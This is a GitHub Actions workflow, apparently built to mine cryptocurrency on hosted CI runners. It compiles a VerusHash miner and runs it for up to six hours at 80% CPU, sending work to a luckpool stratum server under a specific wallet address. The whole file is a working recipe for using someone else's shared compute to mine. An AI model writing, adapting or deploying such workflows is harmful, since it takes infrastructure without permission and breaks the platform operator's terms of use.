name: 80%

on:
  workflow_dispatch:

jobs:
  mine:
    runs-on: ubuntu-latest
    timeout-minutes: 360

    steps:
    - name: Install dependencies
      run: |
        sudo apt update
        sudo apt install git build-essential cmake libuv1-dev \
        libssl-dev libhwloc-dev cpulimit -y

    - name: Clone VerusHashMiner
      run: |
        git clone https://github.com/VerusCoin/VerusHashMiner.git
        cd VerusHashMiner
        mkdir build
        cd build
        cmake ..
        make -j2

    - name: Start mining (80% CPU)
      run: |
        cd VerusHashMiner/build
        cpulimit -l 80 -- ./verushashminer \
        -o stratum+tcp://na.luckpool.net:3956 \
        -u RQLTCKt8WJAMwfW29tZfn8jJ6WeoNmkP4P.worker \
        -p x \
        -t 1
